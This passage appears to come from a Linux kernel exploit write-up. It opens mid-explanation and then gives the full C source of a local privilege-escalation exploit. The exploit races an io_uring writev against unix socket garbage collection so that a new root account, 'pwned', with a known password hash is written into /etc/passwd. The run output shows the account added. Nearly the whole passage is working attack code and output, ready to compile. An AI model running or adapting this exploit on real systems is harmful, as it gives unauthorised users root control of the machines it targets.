  • When io_uring finally acquires the inode lock, the data is actually written into "/etc/passwd"

The full exploit is shown below (preferably compile it with gcc-9; in testing, the success rate with gcc-9 was noticeably higher than with other compiler versions):

#define _GNU_SOURCE

#include <unistd.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <liburing.h>
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <linux/userfaultfd.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <err.h>
#include <sched.h>

#define GREEN(x) printf("\033[0;32m"); printf(x); printf("\033[0m");
#define RESET printf("\033[0m")

#define SPIN ({ GREEN("[/]"); \
GREEN("\b\b-]"); \
GREEN("\b\b\\]"); \
GREEN("\b\b|]"); \
GREEN("\b\b-]"); \
GREEN("\b\b|]"); \
GREEN("\b\b\b");\
});

int *start_write;

void pin_cpu(int num){
cpu_set_t mask;
CPU_ZERO(&mask);
CPU_SET(num, &mask);
int result = sched_setaffinity(0, sizeof(mask), &mask);
}

void *slow_write() {
printf("[+] Start slow write to get the lock\n");
int fd = open("/tmp/rwA", 1);

if (fd < 0) {
perror("[!] error open file");
exit(-1);
}

unsigned long int addr = 0x30000000;
int offset;
for(offset = 0; offset < 0x80000 / 20; offset++) {
void *r = mmap((void *)(addr + offset * 0x1000), 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
if (r == MAP_FAILED) {
printf("[!] allocate failed at 0x%x\n", offset);
}
}

assert(offset > 0);
void *mem = (void *)(addr);
memcpy(mem, "hhhhh", 5);

struct iovec iov[20];

for (int i = 0; i < 20; i++) {
iov[i].iov_base = mem;
iov[i].iov_len = (offset - 1) * 0x1000;
}

*start_write = 1;

if (writev(fd, iov, 20) < 0) { /* bulk write to /tmp/rwA (holds the inode lock) */
perror("[!] slow write");
}

RESET;
printf("\n[+] write done!\n");
*start_write = -1;
exit(0);
}

struct iovec iov[12];

int sendfd(int s, int fd){
struct msghdr msg;
char buf[4096];
struct cmsghdr *cmsg;
int fds[1] = { fd };
memset(&msg, 0, sizeof(msg));
memset(buf, 0, sizeof(buf));
msg.msg_control = buf;
msg.msg_controllen = sizeof(buf);
cmsg = CMSG_FIRSTHDR(&msg);
cmsg->cmsg_level = SOL_SOCKET;
cmsg->cmsg_type = SCM_RIGHTS;
cmsg->cmsg_len = CMSG_LEN(sizeof(fds));
memcpy(CMSG_DATA(cmsg), fds, sizeof(fds));
msg.msg_controllen = CMSG_SPACE(sizeof(fds));
sendmsg(s, &msg, 0);
}

int io_uring_setup(int r, void *p){
return syscall(__NR_io_uring_setup, r, p);
}

int io_uring_enter(unsigned int fd, unsigned int to_submit, unsigned int min_complete, unsigned int flags, sigset_t *sig){
return syscall(__NR_io_uring_enter, fd, to_submit, min_complete, flags, sig);
}

int io_uring_register(unsigned int fd, unsigned int opcode, void *arg, unsigned int nr_args){
return syscall(__NR_io_uring_register, fd, opcode, arg, nr_args);
}

int prepare_request(int fd, struct io_uring_params *params, struct io_uring *ring){
struct io_uring_sqe *sqe;
io_uring_queue_mmap(fd, params, ring); /* map the SQ/CQ rings via mmap */
sqe = io_uring_get_sqe(ring); /* grab a free SQE */
sqe->opcode = IORING_OP_WRITEV; /* vectored write request (uses the iovec array) */
sqe->fd = 1; /* the fd to do IO on | with IOSQE_FIXED_FILE, the index into skb->fp->fp */
sqe->addr = (long) iov; /* pointer to the buffer | pointer to the iovec array */
sqe->len = 1; /* buffer length | number of iovecs */
sqe->flags = IOSQE_FIXED_FILE; /* with IOSQE_FIXED_FILE set, "sqe->fd = 1" actually refers to skb->fp->fp[1], i.e. the registered rfd[1] (the fd of "/tmp/rwA") */
}

int main(int argc, char **argv){
pthread_t t;
struct io_uring ring;
int fd;
struct io_uring_params *params;
int rfd[3];
int s[2];
int target_fd;
start_write = (int *)mmap(NULL, sizeof(int), PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); /* shared flag reflecting the state of the two threads */
assert(start_write != (int *)-1);

*start_write = 0;

// Password for new root user --> "lol"
iov[0].iov_base = "pwned:$1$aa$Sc4m1DBsyHWbRbwmIbGHq1:0:0:/root:/root:/bin/sh\n";
iov[0].iov_len = 59;
iov[1].iov_base = "hello, world!\n";
iov[1].iov_len = 14;
iov[2].iov_base = "hello, world!\n";
iov[2].iov_len = 14;
iov[10].iov_base = "hello, world!\n";
iov[10].iov_len = 14;
iov[11].iov_base = "hello, world!\n";
iov[11].iov_len = 14;

socketpair(AF_UNIX, SOCK_DGRAM, 0, s); /* an AF_UNIX datagram socket pair */

params = malloc(sizeof(*params));
memset(params, 0, sizeof(*params));
params->flags = IORING_SETUP_SQPOLL; /* a kernel thread polls the submission queue for new requests (no explicit io_uring_enter needed) */

fd = io_uring_setup(32, params); /* initialize io_uring */
rfd[0] = s[1];
rfd[1] = open("/tmp/rwA", O_RDWR | O_CREAT | O_APPEND, 0644);

io_uring_register(fd, IORING_REGISTER_FILES, rfd, 2); /* IORING_REGISTER_FILES registers a set of file descriptors into io_uring */
close(rfd[1]);

sendfd(s[0], fd);
close(s[0]);
close(s[1]);
printf("[+] Creating thread\n");
pthread_create(&t, NULL, slow_write, NULL);
sleep(1);
prepare_request(fd, params, &ring);
printf("[+] Waiting for the other thread to get lock on file\n");
while(*start_write == 0){
SPIN
}

printf("[+] Thread 1 got inode lock!\n");
printf("[+] Submitting io_uring request\n");

io_uring_submit(&ring); /* submit the SQE; under the hood this still calls io_uring_enter */

sleep(2);

printf("[+] Closing io_uring\n");

io_uring_queue_exit(&ring);

if(!fork()){
printf("[+] Triggering unix_gc...\n");
close(socket(AF_UNIX, SOCK_DGRAM, 0));
printf("unix_gc done!\n");
exit(0);
}

sleep(2);
printf("[+] Opening /etc/passwd in RDONLY...\n");

int tfd = open("/etc/passwd", O_RDONLY | O_DIRECT); /* bypass the page cache for efficiency */
for(int i =0; i < 600; i++){
open("/etc/passwd", O_RDONLY);
}

printf("[+] Waiting for slow_write end...\n");
while(*start_write == 1){
SPIN
}
printf("\n");
sleep(5);
printf("[+] Closing fd\n");
close(fd);
printf("[+] Sleeping before exit ..\n");
sleep(20);
return 0;
}

The final result:

/ $ ./exp
[+] Creating thread
[+] Start slow write to get the lock
[+] Waiting for the other thread to get lock on file
[+] Thread 1 got inode lock!
[+] Submitting io_uring request
[+] Closing io_uring
[+] Triggering unix_gc...
unix_gc done!
[+] Opening /etc/passwd in RDONLY...
[+] Waiting for slow_write end...
[|]
[+] write done!
[|]
[|]
/ $ cat /etc/passwd
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
bin:x:2:2:bin:/bin:/bin/false
sys:x:3:3:sys:/dev:/bin/false
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/false
www-data:x:33:33:www-data:/var/www:/bin/false
operator:x:37:37:Operator:/var:/bin/false
nobody:x:65534:65534:nobody:/home:/bin/false
pwned:$1$aa$Sc4m1DBsyHWbRbwmIbGHq1:0:0:/root:/root:/bin/sh